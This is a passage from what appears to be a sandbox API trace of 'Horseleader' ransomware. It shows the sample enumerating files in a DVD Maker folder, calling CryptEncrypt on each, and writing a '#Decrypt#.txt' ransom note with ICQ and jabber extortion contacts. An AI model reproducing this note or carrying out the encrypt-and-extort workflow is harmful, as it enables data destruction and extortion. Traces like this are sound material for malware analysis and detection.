Maker\\Shared\\DvdStyles\\OldAge\\NavigationRight_ButtonGraphic.png") returned 88 [0251.639] StrStrIW (lpFirst="NavigationRight_ButtonGraphic.png", lpSrch=".horseleader") returned 0x0 [0251.639] lstrcmpW (lpString1="NavigationRight_ButtonGraphic.png", lpString2="#Decrypt#.txt") returned 1 [0251.639] lstrcmpW (lpString1="NavigationRight_ButtonGraphic.png", lpString2="_uninstalling_.png") returned 1 [0251.639] lstrlenW (lpString=".testttjffg") returned 11 [0251.639] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\NavigationRight_ButtonGraphic.png", lpSrch=".testttjffg") returned 0x0 [0251.639] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.639] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, 
dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.639] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\NavigationRight_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\oldage\\navigationright_buttongraphic.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.639] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6fd340bb, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6fd340bb, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d31329f, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xc2e, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="NavigationRight_SelectionSubpicture.png", cAlternateFileName="")) returned 1 [0251.640] lstrcmpiW (lpString1="NavigationRight_SelectionSubpicture.png", lpString2="Windows") returned -1 [0251.640] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\NavigationRight_SelectionSubpicture.png") returned 94 [0251.640] StrStrIW (lpFirst="NavigationRight_SelectionSubpicture.png", lpSrch=".horseleader") returned 0x0 [0251.640] lstrcmpW (lpString1="NavigationRight_SelectionSubpicture.png", lpString2="#Decrypt#.txt") returned 1 [0251.640] lstrcmpW (lpString1="NavigationRight_SelectionSubpicture.png", lpString2="_uninstalling_.png") returned 1 [0251.640] lstrlenW (lpString=".testttjffg") returned 11 [0251.640] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\NavigationRight_SelectionSubpicture.png", lpSrch=".testttjffg") returned 0x0 [0251.640] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, 
pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.640] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.640] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\NavigationRight_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\oldage\\navigationright_selectionsubpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.640] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6fd0df5e, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6fd0df5e, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d31329f, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x135b, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="NavigationUp_ButtonGraphic.png", cAlternateFileName="")) returned 1 [0251.640] lstrcmpiW (lpString1="NavigationUp_ButtonGraphic.png", lpString2="Windows") returned -1 [0251.640] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\NavigationUp_ButtonGraphic.png") returned 85 [0251.640] StrStrIW (lpFirst="NavigationUp_ButtonGraphic.png", lpSrch=".horseleader") returned 0x0 [0251.640] lstrcmpW (lpString1="NavigationUp_ButtonGraphic.png", lpString2="#Decrypt#.txt") returned 1 [0251.640] lstrcmpW (lpString1="NavigationUp_ButtonGraphic.png", lpString2="_uninstalling_.png") returned 1 [0251.640] lstrlenW (lpString=".testttjffg") returned 11 [0251.640] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD 
Maker\\Shared\\DvdStyles\\OldAge\\NavigationUp_ButtonGraphic.png", lpSrch=".testttjffg") returned 0x0 [0251.640] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.641] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.641] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\NavigationUp_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\oldage\\navigationup_buttongraphic.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.641] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6fd5a218, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6fd5a218, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d3393fd, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xc09, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="NavigationUp_SelectionSubpicture.png", cAlternateFileName="")) returned 1 [0251.641] lstrcmpiW (lpString1="NavigationUp_SelectionSubpicture.png", lpString2="Windows") returned -1 [0251.641] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\NavigationUp_SelectionSubpicture.png") returned 91 [0251.641] StrStrIW (lpFirst="NavigationUp_SelectionSubpicture.png", lpSrch=".horseleader") returned 0x0 [0251.641] lstrcmpW (lpString1="NavigationUp_SelectionSubpicture.png", lpString2="#Decrypt#.txt") returned 1 [0251.641] lstrcmpW (lpString1="NavigationUp_SelectionSubpicture.png", 
lpString2="_uninstalling_.png") returned 1 [0251.641] lstrlenW (lpString=".testttjffg") returned 11 [0251.641] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\NavigationUp_SelectionSubpicture.png", lpSrch=".testttjffg") returned 0x0 [0251.641] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.641] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.641] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\NavigationUp_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\oldage\\navigationup_selectionsubpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.641] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6fc9bb47, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6fc9bb47, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d3393fd, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x6c8d, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="vintage.png", cAlternateFileName="")) returned 1 [0251.641] lstrcmpiW (lpString1="vintage.png", lpString2="Windows") returned -1 [0251.641] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\vintage.png") returned 66 [0251.642] StrStrIW (lpFirst="vintage.png", lpSrch=".horseleader") returned 0x0 [0251.642] lstrcmpW (lpString1="vintage.png", lpString2="#Decrypt#.txt") returned 1 [0251.642] lstrcmpW (lpString1="vintage.png", 
lpString2="_uninstalling_.png") returned 1 [0251.642] lstrlenW (lpString=".testttjffg") returned 11 [0251.642] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\vintage.png", lpSrch=".testttjffg") returned 0x0 [0251.642] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.642] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.642] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\vintage.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\oldage\\vintage.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.642] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6fc9bb47, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6fc9bb47, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d3393fd, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x6c8d, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="vintage.png", cAlternateFileName="")) returned 0 [0251.642] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0251.643] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\#Decrypt#.txt") returned 68 [0251.643] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\#Decrypt#.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\oldage\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, 
dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0251.645] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 
\r\ntell your unique ID\r\n") returned 1508 [0251.645] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0251.646] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0251.646] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0251.646] CloseHandle (hObject=0x158) returned 1 [0251.646] 
GetProcessHeap () returned 0x780000 [0251.647] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0251.647] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9f4fdbf3, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaab8e11a, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9f9e8c42, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="Performance", cAlternateFileName="PERFOR~1")) returned 1 [0251.647] lstrcmpiW (lpString1="Performance", lpString2="Windows") returned -1 [0251.647] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance") returned 59 [0251.647] lstrcmpW (lpString1="Performance", lpString2=".") returned 1 [0251.647] lstrcmpW (lpString1="Performance", lpString2="..") returned 1 [0251.647] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0251.647] GetProcessHeap () returned 0x780000 [0251.647] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0251.647] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\*") returned 61 [0251.647] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9f4fdbf3, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaab8e11a, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9f9e8c42, 
ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0251.653] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0251.653] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\.") returned 61 [0251.653] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0251.653] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9f4fdbf3, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaab8e11a, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9f9e8c42, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="..", cAlternateFileName="")) returned 1 [0251.653] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0251.653] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\..") returned 62 [0251.653] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0251.654] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0251.654] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70562bb6, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x70562bb6, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d35f55b, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xeef, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="720x480blacksquare.png", cAlternateFileName="")) returned 1 [0251.654] lstrcmpiW (lpString1="720x480blacksquare.png", lpString2="Windows") 
returned -1 [0251.654] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\720x480blacksquare.png") returned 82 [0251.654] StrStrIW (lpFirst="720x480blacksquare.png", lpSrch=".horseleader") returned 0x0 [0251.654] lstrcmpW (lpString1="720x480blacksquare.png", lpString2="#Decrypt#.txt") returned 1 [0251.654] lstrcmpW (lpString1="720x480blacksquare.png", lpString2="_uninstalling_.png") returned 1 [0251.654] lstrlenW (lpString=".testttjffg") returned 11 [0251.654] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\720x480blacksquare.png", lpSrch=".testttjffg") returned 0x0 [0251.654] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.655] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.655] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\720x480blacksquare.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\720x480blacksquare.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.656] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x703015e6, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x703015e6, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d35f55b, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x1168, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="NextMenuButtonIcon.png", cAlternateFileName="")) returned 1 [0251.656] lstrcmpiW 
(lpString1="NextMenuButtonIcon.png", lpString2="Windows") returned -1 [0251.656] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\NextMenuButtonIcon.png") returned 82 [0251.656] StrStrIW (lpFirst="NextMenuButtonIcon.png", lpSrch=".horseleader") returned 0x0 [0251.656] lstrcmpW (lpString1="NextMenuButtonIcon.png", lpString2="#Decrypt#.txt") returned 1 [0251.656] lstrcmpW (lpString1="NextMenuButtonIcon.png", lpString2="_uninstalling_.png") returned 1 [0251.656] lstrlenW (lpString=".testttjffg") returned 11 [0251.656] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\NextMenuButtonIcon.png", lpSrch=".testttjffg") returned 0x0 [0251.656] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.656] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.656] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\NextMenuButtonIcon.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\nextmenubuttonicon.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.657] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70327743, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x70327743, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4dbda349, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xc04, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="NextMenuButtonIconSubpictur.png", 
cAlternateFileName="")) returned 1 [0251.657] lstrcmpiW (lpString1="NextMenuButtonIconSubpictur.png", lpString2="Windows") returned -1 [0251.657] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\NextMenuButtonIconSubpictur.png") returned 91 [0251.657] StrStrIW (lpFirst="NextMenuButtonIconSubpictur.png", lpSrch=".horseleader") returned 0x0 [0251.657] lstrcmpW (lpString1="NextMenuButtonIconSubpictur.png", lpString2="#Decrypt#.txt") returned 1 [0251.657] lstrcmpW (lpString1="NextMenuButtonIconSubpictur.png", lpString2="_uninstalling_.png") returned 1 [0251.657] lstrlenW (lpString=".testttjffg") returned 11 [0251.657] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\NextMenuButtonIconSubpictur.png", lpSrch=".testttjffg") returned 0x0 [0251.657] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.657] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.657] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\NextMenuButtonIconSubpictur.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\nextmenubuttoniconsubpictur.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.657] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70184844, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x70184844, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4dc26605, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, 
